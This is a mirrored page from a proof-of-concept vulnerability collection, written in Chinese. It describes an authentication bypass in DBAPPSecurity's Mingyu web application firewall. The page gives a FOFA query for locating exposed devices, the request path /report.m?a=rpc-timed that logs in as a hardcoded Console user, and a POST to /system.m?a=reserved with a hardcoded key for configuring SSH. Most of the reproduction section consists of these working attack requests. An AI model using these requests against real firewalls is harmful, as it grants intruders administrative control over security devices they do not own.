admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 20:06:03 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/网络设备漏洞/安恒 明御WEB应用防火墙 report.php 任意用户登录漏洞.md
Threekiii 787d4d4465 更新漏洞库:网络设备漏洞/
2022-08-24 14:34:12 +08:00

985 B
Raw Blame History

安恒 明御WEB应用防火墙 report.php 任意用户登录漏洞

漏洞描述

安恒 明御WEB应用防火墙 report.php文件存在硬编码设置的Console用户登录攻击者可以通过漏洞直接登录后台

漏洞影响

安恒 明御WEB应用防火墙

FOFA

app="安恒信息-明御WAF"

漏洞复现

登录页面

image-20220824142132930

验证POC

/report.m?a=rpc-timed

image-20220824142150382

再访问主页面跳转配置页面

image-20220824142208002

发送请求包配置系统SSH等

POST /system.m?a=reserved
  
key=!@#dbapp-waf-dev-reserved#@!

image-20220824142219609